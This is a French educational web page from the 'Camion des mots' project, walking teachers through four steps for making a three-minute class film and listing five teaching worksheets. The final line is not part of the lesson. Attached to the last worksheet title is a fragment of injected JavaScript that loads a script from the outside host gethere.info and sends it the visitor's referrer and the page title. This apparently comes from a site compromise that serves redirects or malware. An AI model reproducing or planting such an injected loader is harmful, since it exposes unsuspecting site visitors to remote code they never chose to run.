Les cookies assurent le bon fonctionnement de notre site Internet. En utilisant ce dernier, vous acceptez l'utilisation des cookies. En savoir plus OK
Comment réaliser une vidéo | Camion des mots
Suivez nous :
Nous contacter : 01.42.61.10.71

Comment réaliser une vidéo

Découvrez ici les détails des différentes étapes qui conduiront vos classes à réussir leur court métrage de 3 minutes.


Présentation du nouveau Camion des mots par Camion_Des_Mots

Etape 1: Choisir un texte à interpréter

A quatre semaines de l’arrivée du Camion des mots dans votre ville, choisissez bien votre texte. De l’interprétation d’une poésie à la mise en scène d’une pièce de théâtre, tous les répertoires sont acceptés. Il vous sera aussi possible d’écrire votre propre texte.

L’annexe en bas de page peut vous guider quant au choix d’un texte.

N’hésitez pas à vous aider de la fiche pédagogique ci-après :

Fiche pédagogique 1 : Choisir un texte à interpréter

Etape 2: L’adaptation de l’extrait

A cette étape, il s’agit d’analyser le texte, son style et de penser aux décors, costumes, accessoires… Le spectateur doit être plongé dans votre histoire. Vous construisez petit à petit la mise en scène de votre texte.

La 2e fiche pédagogique vous guidera dans ce travail :

Fiche pédagogique 2 : L’adaptation de l’extrait

Etape 3: Le casting et l’interprétation

Vous commencez à attribuer les rôles qu’occuperont vos élèves. Narrateur, acteur, figurant… chacun d’entre eux prend part à la réalisation du projet. Vous pouvez d’ailleurs leur faire confiance : l’expérience montre que les élèves trouvent assez naturellement leur place au sein du groupe.

Notre conseil : attachez-vous à mettre l’accent sur l’élocution.

La 3e fiche pédagogique vous délivre quelques secrets pour la bonne marche de vos répétitions :

Fiche pédagogique 3 : Le casting et l’interprétation

Etape 4: Dans le camion

Afin d’être prêt pour le Jour J, faites un repérage des lieux grâce à cette 4e fiche pédagogique. Vous prendrez connaissance des dimensions de la scène, ce qui vous aidera à affiner votre mise en scène.

Notre studio de tournage est équipé de trois caméras, de cinq microphones (4 au plafond, 1 au sol) et de rampes d’éclairage. C’est à vous de jouer!

Ci dessous, la 4e fiche pédagogique, schéma du studio du Camion des mots:

Fiche pédagogique 4 : Dans le camion

Annexe : La bibliographie de secours

Cette liste d’ouvrages adaptés à la littérature de jeunesse est conseillée par le ministère de l’Education nationale. Diverses propositions de genres, de niveaux et de catégories peuvent vous apporter une aide pour l’étape 1 de votre projet.

Consultez la fiche pédagogique 5:

Fiche pédagogique 5 : La bibliographie de secourss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;